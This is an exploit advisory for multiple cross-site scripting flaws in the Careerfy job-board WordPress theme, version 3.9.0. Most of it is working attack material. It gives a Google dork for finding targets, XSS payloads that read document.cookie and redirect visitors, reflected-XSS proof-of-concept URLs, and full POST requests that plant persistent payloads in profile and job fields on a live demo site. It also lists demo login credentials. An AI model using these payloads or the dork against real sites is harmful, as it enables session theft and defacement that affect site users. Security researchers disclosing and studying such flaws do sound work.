Careerfy - Job Board WordPress Theme v3.9.0

[+] Exploit Title: Careerfy - Job Board WordPress Theme v3.9.0 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/careerfy/
[+] Date: 2020-07-01
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 3.9.0
[+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the Careerfy Job Board theme through 3.9.0 for WordPress.

[i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

[i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/

[i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/

[i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Academic Level, Age, Salary, Gender, Industry, Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)



### [ Payloads: ]

[$] " autofocus onfocus=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; ">

[$] "><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>

[$] "><img src=x onerror="alert(document.cookie);">



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://careerfy.net/petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50

[!] GET /petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50 HTTP/1.1
Host: careerfy.net

[!] https://careerfy.net/careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time

[!] GET /careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time HTTP/1.1
Host: careerfy.net



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------122256774439635172062989578806
Content-Length: 5335
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"

01-07-2020
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_phone"

OK
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="dial_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_sector"

41
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

XSS
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_bio"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="academic-level"

masters-degree"><img src=x onerror=alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="Age"

18-22-years"><img src=x onerror=alert(document.domain);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="salary"

1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="gender"

hacker"><img src=x onerror=alert(`YAY!`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="industry"

web-security"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_twitter_url"

https://twitter.com/vlad_vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lat"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lng"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------122256774439635172062989578806--



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------207058957013654520581670329262
Content-Length: 5853
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_phone"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="dial_code"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="contry_iso_code"

ru
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_website"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_sector"

33
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_bio"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="founded-since"

2018
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_address"

OK"><img src=x onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: image/jpeg


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

1337"><img src=x onerror=alert(document.domain);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------207058957013654520581670329262--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------5410881451781327061235735546
Content-Length: 4680
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update
Cookie: [cookies_here]

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="application_deadline"

July 2, 2020 2:48 pm"><img src=x onerror=alert(document.cookie);>
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_sector"

33
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_type"

21
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="get_job_skills[]"

Developer"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_type"

internal"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_url"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_email"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_max_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="offered-salary"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="career-level"

officer"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="experience"

less-than-1-year"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="gender"

male"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="Industry"

development"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="qualifications"

certificate"><img src=x onerror=alert(document.domain); >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`VLADVECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lat"

55.761035
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lng"

37.536004
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

9.719789233510344
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------5410881451781327061235735546--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector